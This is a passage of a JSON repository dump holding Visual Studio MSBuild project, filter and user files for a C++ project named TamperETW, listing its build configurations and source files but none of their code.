<PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>15.0</VCProjectVersion>\n    <ProjectGuid>{070FC08C-B93E-426A-9C86-48E9C5DBFEA1}</ProjectGuid>\n    <RootNamespace>UnmanagedCLR</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>\n    <ProjectName>TamperETW</ProjectName>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v141</PlatformToolset>\n    <CharacterSet>MultiByte</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v141</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>MultiByte</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v141</PlatformToolset>\n    <CharacterSet>MultiByte</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v141</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>MultiByte</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.props\" />\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup />\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <SDLCheck>true</SDLCheck>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <SDLCheck>true</SDLCheck>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"TamperETW.cpp\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"TamperETW.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <MASM Include=\"Syscalls.asm\">\n      <FileType>Document</FileType>\n    </MASM>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.targets\" />\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "TamperETW/UnmanagedCLR/UnmanagedCLR.vcxproj.filters",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <MASM Include=\"Syscalls.asm\">\n      <Filter>Source Files</Filter>\n    </MASM>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"TamperETW.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"TamperETW.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "TamperETW/UnmanagedCLR/UnmanagedCLR.vcxproj.user",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup />\n</Project>"
  }
]